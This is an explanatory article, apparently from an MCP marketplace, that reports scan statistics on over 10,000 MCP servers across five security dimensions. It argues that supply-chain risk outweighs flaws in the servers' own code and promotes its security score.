What Makes an MCP Server Secure (and the 5 Ways They Go Wrong)

A secure MCP server gets five things right: a trustworthy supply chain, a package that matches its source, clean code, a verifiable remote endpoint, and spec-compliant transport. MCP servers are the plug-in tools that extend AI assistants like Claude and ChatGPT. When we security-scanned more than 10,000 of them, those five dimensions are exactly where a server passes or fails. The useful surprise in the data is how lopsided the failures are. Supply chain produces more serious findings than the other four dimensions combined. The server's own code, the thing most people actually read before installing, is almost never where the risk lives.

Here is what each dimension means, how often servers get it wrong, and what a secure server looks like.

A "serious finding" means high or critical severity. The "any finding" column includes minor and informational flags that usually do not affect safety, so a high any-finding rate is not the same as high risk.

1. Supply chain: the one that actually bites

This is where MCP servers go wrong, and it is not close. Nearly 1 in 3 servers we scanned (31.8%) has a high or critical supply-chain finding, more than every other dimension combined.

Supply-chain risk means the danger comes from what a server pulls in and runs, not from the server itself. When you install one, it often fetches other packages and dependencies from outside sources. If any of those are untrusted, unverifiable, or different from what the author published, that code runs with the same access the server has. Crucially, none of it lives in the repository you read before installing, so a clean-looking codebase tells you nothing about it.

What a secure server looks like: pinned, verifiable dependencies from trusted sources, no install step that quietly fetches and runs remote code, and a clear, auditable path from the source you can read to the package you actually install.

2. Package verification: common, usually minor

Almost half of servers (46.9%) have some package-verification finding, but only 4.0% rise to high or critical. So this is the most frequently flagged dimension and one of the least dangerous.

Package verification asks a simple question: does the published package cleanly match its stated source? A mismatch is often innocent, a stale build or a missing tag. Occasionally it is the early signal of something worse, which is why it gets flagged even when minor.

What a secure server looks like: the published artifact matches its source repository, versions are tagged, and there is no gap between the code you can inspect and the code that ships.

3. Code vulnerabilities: rarely the problem

Here is the counterintuitive one. Only 5.2% of servers have any code-vulnerability finding at all, and just 1.6% have a serious one. The server's own code, the part you would skim on GitHub before installing, is almost never where the risk is.

That matters because it is exactly backwards from how most people vet a server. A clean-looking repo feels safe, but a clean repo tells you almost nothing about the supply-chain risk in dimension 1.

What a secure server looks like: input is validated, scope is limited to what the server actually needs, and user input never flows straight into a shell command. Good code hygiene helps, but it is table stakes, not the differentiator.

4. Remote endpoint trust: a yellow flag, not a red one

About 22.7% of servers carry a remote-trust flag, but on its own it never rises to high or critical, which is why it shows as zero in the serious column. Treat it as a caution signal, not an alarm.

Remote trust applies to hosted servers whose endpoint or operator is hard to verify. You are sending data to a server someone else runs, so who runs it and whether you can confirm that is worth knowing. It rarely makes a server dangerous by itself, but it compounds a supply-chain or package problem, which is why it still counts toward a server's profile.

What a secure server looks like: a clearly identified operator, a verifiable endpoint, and transparency about where your data goes once it leaves your machine.

5. Transport and protocol: spec compliance

Around 31.2% of servers have a transport or protocol finding, and 2.7% are serious. These are servers whose transport or protocol handling does not follow the MCP spec.

Most of these are correctness and reliability issues rather than direct attacks. But protocol handling that ignores the spec is also where edge-case bugs and unexpected behavior hide, which is why it counts toward a server's security profile.

What a secure server looks like: standards-compliant transport, correct protocol handling, and no improvised deviations from the spec.

So what makes a server secure?

A secure MCP server is clean across all five dimensions, but the data says the one to actually worry about is the supply chain. The good news is that you do not have to evaluate five dimensions by hand on every server. That is what a security score is for: it rolls all five into one number you can see before you install.

The reflex most people have, reading the repo, is the weakest check of the five. The repo shows you dimension 3, the one that almost never fails. It tells you nothing about the supply chain, the one that does.

Browse security-scanned MCP servers, sorted by security score

For the full distribution of how risky the MCP ecosystem actually is, see our data study on how safe MCP servers are. For a plain-language primer on the risks, see whether MCP servers are safe.

Methodology: figures reflect automated security scans of the live MCP Marketplace catalog as of June 2026, covering more than 10,000 listed servers (those in approved or publicly flagged status). Findings are grouped into the five categories above and rated by severity by our automated scanner. We report aggregate results only, and percentages are rounded.